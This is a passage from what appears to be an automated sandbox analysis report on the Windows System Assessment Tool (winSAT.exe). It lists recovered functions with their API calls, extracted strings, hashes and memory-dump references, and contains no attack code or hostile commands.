                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: $string too large to process
                                                                                                                                                                                              • API String ID: 0-3116065436
                                                                                                                                                                                              • Opcode ID: 1b97914a1a9df404f04de82bebe9e4b098128cddfbe8fe213e5466cb3016d9b9
                                                                                                                                                                                              • Instruction ID: b134a3e4fcb41da7d92383400c729a9b0e5d739d7fa9d2dc050db041b738beb0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b97914a1a9df404f04de82bebe9e4b098128cddfbe8fe213e5466cb3016d9b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A51B452B0DB4681EE60AB15D4186B9A351BB14BE0FF48631DE2D0B7D4EE6CF442C360
                                                                                                                                                                                              Function 00007FF780FEB5B0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                              • API String ID: 2962429428-2766056989
                                                                                                                                                                                              • Opcode ID: f0e0a79044631692a8ebdc8c93d1c2324464e952b39bedb089079a84b687857d
                                                                                                                                                                                              • Instruction ID: 1507bcd8c4f1cf921313c29d0090d5ac548d887c11b48489c2b6d592469ed216
                                                                                                                                                                                              • Opcode Fuzzy Hash: f0e0a79044631692a8ebdc8c93d1c2324464e952b39bedb089079a84b687857d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 19512C326097C186DB44EF25D48426DB7A8FB40B68F684334CE692B7E9CF34D451DB64
                                                                                                                                                                                              Function 00007FF780FE3B5C Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: iswdigit$StringType
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3141519268-0
                                                                                                                                                                                              • Opcode ID: 7943b21fa890139467477ac11817c7270bd715b364c4a8ecc746ab01dab18d91
                                                                                                                                                                                              • Instruction ID: e0de667d257bfb1030b3e8b208ef189a67158341805464925fbcce72f6a9f23d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7943b21fa890139467477ac11817c7270bd715b364c4a8ecc746ab01dab18d91
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED41BE36B08B6185E7109F26D8495BCB7B4FB08B94BA58232DF5D67794CF39E852C320
                                                                                                                                                                                              Function 00007FF780FD0654 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 656ccf8e56003dd00ba27a20e1028cf33374c4e5483edc1c2cd6fac714bd62d6
                                                                                                                                                                                              • Instruction ID: 882cc2e8f76948cb10dc3098dc0397f6cdb10e7aaddd9a6ce35f7b490c5c4f54
                                                                                                                                                                                              • Opcode Fuzzy Hash: 656ccf8e56003dd00ba27a20e1028cf33374c4e5483edc1c2cd6fac714bd62d6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 43411576A08740DBD758DF29E68466CBBA1F749B44B64412ADF0D83B84DB38F861CF50
                                                                                                                                                                                              Function 00007FF780FA16BC Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CloseCriticalDeleteHandleSection
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 505967962-0
                                                                                                                                                                                              • Opcode ID: ac82a47d4926cf68bf6d85c7b37c7b215830d8727781aff910250bec3131e545
                                                                                                                                                                                              • Instruction ID: 5da5dd9fec90ba6d84519fe3679bf6de3200ce4fb8993eff7bac7ed9e6dc9832
                                                                                                                                                                                              • Opcode Fuzzy Hash: ac82a47d4926cf68bf6d85c7b37c7b215830d8727781aff910250bec3131e545
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B414D36515B8185E700AF35E8403ACB7A8F786FA8F689232DAAD477D9CF789415C720
                                                                                                                                                                                              Function 00007FF780FA1580 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHandleInformationLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1721798545-0
                                                                                                                                                                                              • Opcode ID: 9c3d5c6714fb01d11f4e789b048eb60763e18ac3f6880b96439a46e78df98c2f
                                                                                                                                                                                              • Instruction ID: abba30c4c32b06dd33ab6fc7597e3d0e3704d072a597d3252970965e73027095
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c3d5c6714fb01d11f4e789b048eb60763e18ac3f6880b96439a46e78df98c2f
                                                                                                                                                                                              • Instruction Fuzzy Hash: D7319526A0C6428DEB10AF22D50437CB7A4FB45BA8FA99335DA1D873D5DF38E455C720
                                                                                                                                                                                              Function 00007FF780FA0DD0 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHandleInformationLast
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1721798545-0
                                                                                                                                                                                              • Opcode ID: 7c3c1a2f421d45862a626c723fdf297ce25a4371ef449f0c3a1e225bba49b83f
                                                                                                                                                                                              • Instruction ID: 768768b71ac5db51eff8ec1828d0cdc6c241bc63e5538c7f2eb8cde498599e81
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c3c1a2f421d45862a626c723fdf297ce25a4371ef449f0c3a1e225bba49b83f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 39315E22A0C68286EB50AF26E48437CB7A0FF45BA8FA49631CA1D473D5DF38E455D760
                                                                                                                                                                                              Function 00007FF780FCAFC0 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$FormatFreeLocalMessagememcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3774668041-0
                                                                                                                                                                                              • Opcode ID: 2b6df9141afdadc20052150afb64400c460fccaacc2cf9b6ccf4426e51ad455b
                                                                                                                                                                                              • Instruction ID: 2f23faaeada734bb8fdeb852dbda46b3aae22ae75e8eff2c21bdf3493e740a3f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b6df9141afdadc20052150afb64400c460fccaacc2cf9b6ccf4426e51ad455b
                                                                                                                                                                                              • Instruction Fuzzy Hash: F6118E36B4874187EB04AB52E445379EAA0FB88F94FA0C134CA0943384DF7CE508CB60
                                                                                                                                                                                              Function 00007FF780FAB9C0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CurrentDirectory
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3993060814-0
                                                                                                                                                                                              • Opcode ID: 66026269d3f782af18e77c11081d84aeed5cc2034645c7a6164c080f3207e5d9
                                                                                                                                                                                              • Instruction ID: e3a895959942354863c65153f25dd8d617e4e0a640c8ff1cd27da41fde9eb44e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 66026269d3f782af18e77c11081d84aeed5cc2034645c7a6164c080f3207e5d9
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF112125B0C54286E7047B22A98017DAA51FF8DB84FA4E430DA0E47396CF6CE865C710
                                                                                                                                                                                              Function 00007FF780FD916C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4993
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: memset.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49A0
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: RegOpenKeyExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE49CF
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A0C
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: RegQueryValueExW.ADVAPI32(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4A73
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AA6
                                                                                                                                                                                                • Part of subcall function 00007FF780FE4970: _wcsicmp.MSVCRT(?,?,?,00000400,?,?,?,00007FF780FD91AA), ref: 00007FF780FE4AD6
                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00007FF780FD91B6
                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00007FF780FD91D9
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _wcsicmp$QueryValuememset$Open
                                                                                                                                                                                              • String ID: AMD$Intel
                                                                                                                                                                                              • API String ID: 2659426807-812452489
                                                                                                                                                                                              • Opcode ID: 5dbbfd75c03e96538a10ee79a81ea940d08ce4b7ba0d0388eb7cc50b7ef293c6
                                                                                                                                                                                              • Instruction ID: 0ab7087ee74bc2da97773d9bc927276a708e7bb5a768fd04cbfd413e763734e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dbbfd75c03e96538a10ee79a81ea940d08ce4b7ba0d0388eb7cc50b7ef293c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8511A572628582C6EB10EF20E8443E9B3B0FB88748FE05135D94D46299EFBCE148CB10
                                                                                                                                                                                              Function 00007FF780FCE2F8 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE362
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00007FF780FD4D25,?,?,?,?,00007FF780FD56A9), ref: 00007FF780FCE37B
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE41F
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetCurrentProcessId.KERNEL32 ref: 00007FF780FCE440
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: GetTickCount.KERNEL32 ref: 00007FF780FCE459
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _snprintf_s.MSVCRT ref: 00007FF780FCE48C
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: _vsnprintf_s.MSVCRT ref: 00007FF780FCE4DB
                                                                                                                                                                                                • Part of subcall function 00007FF780FCE3AC: EventEnabled.ADVAPI32 ref: 00007FF780FCE500
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledEvent$CloseCountCriticalCurrentEnterHandleProcessSectionTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: ERROR: Cannot stop ETW tracing; %s$base\winsat\exe\logging.cpp
                                                                                                                                                                                              • API String ID: 697001006-2049587427
                                                                                                                                                                                              • Opcode ID: e9eb3332699555419bca0fba8b37aae1dd574f9e13e657f37d01426586351c8f
                                                                                                                                                                                              • Instruction ID: 80e7952cd72688173136c12acb71138862052ca2c9b34fc9770d0cfbaf94afb0
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9eb3332699555419bca0fba8b37aae1dd574f9e13e657f37d01426586351c8f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32110620E0CA0282EB40BB11E816379AAA0BF45734FF08731D42D422E5DFADB549CB20
                                                                                                                                                                                              Function 00007FF780FD7954 Relevance: 6.0, APIs: 4, Instructions: 34synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD7964
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenFileMappingW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A21
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenEventW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A49
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenEventW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A68
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: OpenEventW.KERNEL32(?,?,?,?,?,?,00007FF780FD78D8), ref: 00007FF780FD7A89
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: MapViewOfFile.KERNEL32 ref: 00007FF780FD7ACA
                                                                                                                                                                                                • Part of subcall function 00007FF780FD7A04: memset.MSVCRT ref: 00007FF780FD7AED
                                                                                                                                                                                              • memset.MSVCRT(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD798D
                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD79C0
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,?,00000000,00007FF780F9993E), ref: 00007FF780FD79D8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EventOpen$Filememset$CriticalEnterMappingObjectSectionSingleViewWait
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3303213161-0
                                                                                                                                                                                              • Opcode ID: 5320e3f3973cd6285b9d104281ce226ecc62111e7dd1a2c7771f826abbfa0aae
                                                                                                                                                                                              • Instruction ID: 6badd2029e8cf6791fed2a5fd0506ead98a53546d1ef1c546fcb43deee8d0cf5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5320e3f3973cd6285b9d104281ce226ecc62111e7dd1a2c7771f826abbfa0aae
                                                                                                                                                                                              • Instruction Fuzzy Hash: EA018C25E0DA0282FF00BB16E864374EA60FF89B49FA48032DD4E427A1EE7DA105C730
                                                                                                                                                                                              Function 00007FF780FAC9F7 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$ErrorLast$FindHandleLoadLockModuleSizeof
                                                                                                                                                                                              • String ID: base\winsat\exe\app.cpp
                                                                                                                                                                                              • API String ID: 3821725400-942674931
                                                                                                                                                                                              • Opcode ID: fbccdc26b17c50413b82e91fa6cc295bbaddd5ac76a4aa56d5fcd7c411217ee7
                                                                                                                                                                                              • Instruction ID: c9c54f696b67acf209ef272b550398dcf5bdda8b7a5c477bd22e2fb5a1138494
                                                                                                                                                                                              • Opcode Fuzzy Hash: fbccdc26b17c50413b82e91fa6cc295bbaddd5ac76a4aa56d5fcd7c411217ee7
                                                                                                                                                                                              • Instruction Fuzzy Hash: D1F08236B189018AE3016B10EC041BDAA51FB8AB71FE48134CD0E463A1DF7D9486DB20
                                                                                                                                                                                              Function 00007FF780FD28FC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$AttributesFile
                                                                                                                                                                                              • String ID: all$base\winsat\exe\viewlog.cpp
                                                                                                                                                                                              • API String ID: 1147080190-601010949
                                                                                                                                                                                              • Opcode ID: 692b8284cd75ab390046dfdf82264e055fe161909b967462e05073799d8745c0
                                                                                                                                                                                              • Instruction ID: 9746ff76825f0d0396f62a39e2c3a731d15cf935fa0ffb8924ecce5078ffe05d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 692b8284cd75ab390046dfdf82264e055fe161909b967462e05073799d8745c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 71519261A0C64245EA50EB62D8541F8A760FF51B98FA49532EE0E47BD6DF3CF542C3A0
                                                                                                                                                                                              Function 00007FF780F93888 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
